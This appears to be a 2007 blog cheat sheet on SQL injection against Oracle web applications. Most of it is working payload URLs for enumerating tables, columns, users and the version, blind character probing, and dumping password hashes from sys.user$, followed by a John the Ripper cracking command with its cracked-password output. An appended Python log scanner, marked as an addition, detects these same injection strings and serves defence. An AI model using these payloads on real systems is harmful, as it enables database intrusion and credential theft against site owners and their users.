SQL Injection In Oracle

July 11, 2007

1. Finding table names

select table_name from user_tables

Example:-

http://192.168.2.199/ora.php?id=101+union+all+select+table_name+from+user_tables

Blind injection: http://192.168.2.199/ora.php?id=101+and+ascii(substr((select+table_name+from+user_tables+where+rownum=1),1,1))>100

———————————————–

2. Iterating through the different rows:

Unfortunately this is not as straightforward, because Oracle has no LIMIT clause; instead, ROWNUM is assigned in an inner query and filtered on in the outer one.

Syntax:- select column_1, column_2 from (select rownum r_, column_1, column_2 from table_1, table_2 where field_3 = 'some value') where r_ = 2

Example:-

http://192.168.2.199/ora.php?id=101+UNION+ALL+SELECT+TABLE_NAME+FROM+(SELECT+ROWNUM+R,+TABLE_NAME+FROM+USER_TABLES)+WHERE+R=1

————————————————————————–

3. Finding column names:

select+column_name+from+user_tab_columns

————————————————————————–

4. Finding Version:

Select banner from v$version

———————————————————————–

5. Finding database user names:-

http://192.168.2.199/ora.php?id=101+union+all+select+username,null+from+all_users

———————————————————————

6. Finding password hashes (the user in the connection string should be a DBA):

select name,astatus, password from sys.user$ where astatus =0;

(astatus = 0 selects only the users whose accounts are not locked)

Example:- http://192.168.2.199/ora.php?id=101+union+all+select+name||'-'||password+from+sys.user$

In the above example I had only one column in which to select a string from the database, so I concatenated the username and password fields together, separated with '-'.

—————————————————————————-

7. Cracking passwords using John the Ripper:-

Thanks to pentestmonkey for this.

$ ./john --rules --wordlist=/home/sid/tools/dictionaries/MAIN-ONE-unix.txt --format=oracle ~/opass

Loaded 14 password hashes with 14 different salts (Oracle [oracle])
DIP              (DIP)
ORACLE           (FLOWS_020100)
ORACLE           (FLOWS_FILES)
ORACLE           (XDB)
ORACLE           (CTXSYS)
PASSWORD         (HR)
PASSWORD         (SYSTEM)
PASSWORD         (SYS)
TEST             (TEST2)
TEST1            (TEST1)
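As an added example (not part of the original post), the following Python scans web-server access-log lines for the Oracle dictionary objects and constructs that the injection strings in steps 1 to 6 rely on (UNION SELECT, USER_TABLES, ROWNUM, SYS.USER$, ASCII(SUBSTR(...)) and so on), decoding the query string first so that '+' and %XX encoding do not hide them. The log lines, the client address and the path ora.php are constructed sample input.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Oracle dictionary objects and constructs used in the injection strings above.
ORACLE_SQLI_PATTERNS = [
    r"\bunion\s+(?:all\s+)?select\b",
    r"\buser_tables\b",
    r"\buser_tab_columns\b",
    r"\ball_users\b",
    r"\bv\$version\b",
    r"\bsys\.user\$",
    r"\brownum\b",
    r"\bascii\s*\(\s*substr\s*\(",  # blind probing, one character at a time
]
_SIGNATURE = re.compile("|".join(ORACLE_SQLI_PATTERNS), re.IGNORECASE)
# Request line of a combined-format access log: "GET /path?query HTTP/1.1"
_REQUEST = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/[\d.]+"')

# Constructed sample log lines (hypothetical client, path and timestamps).
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Jul/2007:10:00:01 +0000] "GET /ora.php?id=101 HTTP/1.1" 200 512',
    '10.0.0.5 - - [11/Jul/2007:10:00:07 +0000] "GET /ora.php?id=101+union+all+select'
    '+table_name+from+user_tables HTTP/1.1" 200 2048',
    '10.0.0.5 - - [11/Jul/2007:10:00:09 +0000] "GET /ora.php?id=101+and+ascii(substr(('
    'select+table_name+from+user_tables+where+rownum=1),1,1))>100 HTTP/1.1" 200 512',
    '10.0.0.5 - - [11/Jul/2007:10:00:12 +0000] "GET /ora.php?id=101+union+all+select'
    '+name||%27-%27||password+from+sys.user$ HTTP/1.1" 200 2048',
]

def decode_params(url):
    """Decoded (name, value) pairs; '+' and %XX are undone, so 'id=101+union' is seen as '101 union'."""
    return parse_qsl(urlsplit(url).query, keep_blank_values=True)

def matches(value):
    """Distinct Oracle SQLi signatures found in one decoded parameter value."""
    return sorted({m.group(0).lower() for m in _SIGNATURE.finditer(value)})

def scan_log(lines):
    """Return (line_no, param_name, signatures) for every suspicious parameter."""
    hits = []
    for n, line in enumerate(lines, 1):
        req = _REQUEST.search(line)
        if not req:
            continue
        for name, value in decode_params(req.group(1)):
            found = matches(value)
            if found:
                hits.append((n, name, found))
    return hits
```

Running scan_log(SAMPLE_LOG) flags lines 2, 3 and 4 and names the constructs found in each, while the plain id=101 request on line 1 is left alone.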
——————————————————————————